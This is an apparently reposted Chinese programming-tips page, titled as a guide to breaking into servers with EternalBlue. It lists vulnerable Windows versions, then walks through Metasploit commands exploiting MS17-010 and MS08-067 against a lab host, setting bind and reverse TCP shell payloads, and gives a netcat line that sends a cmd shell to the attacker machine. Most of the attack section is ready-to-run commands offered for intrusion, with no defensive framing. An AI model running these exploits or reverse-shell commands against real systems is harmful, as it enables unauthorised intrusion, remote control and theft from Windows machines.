當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

發布時間：2025/3/11 编程问答 34 豆豆

生活随笔收集整理的這篇文章主要介紹了利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1. 永恒之藍Eternalblue 攻擊

Eternalblue 通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞

惡意代碼會掃描開放445文件共享端口的Windows機器，無需用戶任何操作，只要開機上網，不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

模擬漏洞的機器類型:

Windows XP (all services pack) (x86) (x64)

Windows Server 2003 SP1/SP2 (x86)

Windows Server 2003 (x64)

Windows Server 2008 (x86)

Windows Server 2008 R2 (x86) (x64)

Windows 7 (all services pack) (x86) (x64)

2.使用msf攻擊msf5 auxiliary(scanner/portscan/syn) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.116.130

rhost => 192.168.116.130? (目標機為英文版Windows Server 2003 (x64))

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

3. 緩沖區溢出攻擊(正向攻擊)msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/bind_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.116.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

4. 緩沖區溢出攻擊(反向鏈接攻擊)msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.116.128

msf5 exploit(windows/smb/ms08_067_netapi) > run

在目標機運行nc -vn -e cmd 192.168.116.128 4444

回到攻擊機輸入pwd

以上是生活随笔為你收集整理的利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。